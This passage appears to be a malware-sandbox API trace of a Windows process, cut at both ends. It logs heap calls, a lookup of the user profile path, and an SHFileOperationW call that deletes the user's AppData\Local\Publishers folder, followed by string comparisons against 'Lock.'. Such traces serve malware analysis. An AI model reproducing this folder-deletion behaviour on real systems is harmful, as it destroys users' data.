ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="8wekyb3d8bbwe", cAlternateFileName="8WEKYB~1")) returned 0 [0199.336] FindClose (in: hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0199.344] GetLastError () returned 0x12 [0199.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0199.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0199.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0199.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0199.344] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0199.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0199.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0199.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0199.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0199.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0199.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0199.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0199.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0199.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0199.345] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa780 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0199.345] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0199.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0199.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0199.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0199.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0199.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0199.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0199.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0199.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0199.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0199.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0199.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5f6c0 [0199.346] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Publishers", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpFilePart=0x8cf650*="Publishers") returned 0x28 [0199.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0199.346] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\publishers")) returned 0x10 [0199.346] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0200.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0200.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0200.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0200.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0200.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0200.037] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0200.117] TranslateMessage (lpMsg=0x8cf968) returned 0 [0200.117] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0200.117] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0200.117] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0200.117] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0200.118] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.118] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0200.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0200.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0200.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0200.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Resmon.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esmon.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smon.ResmonCfg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 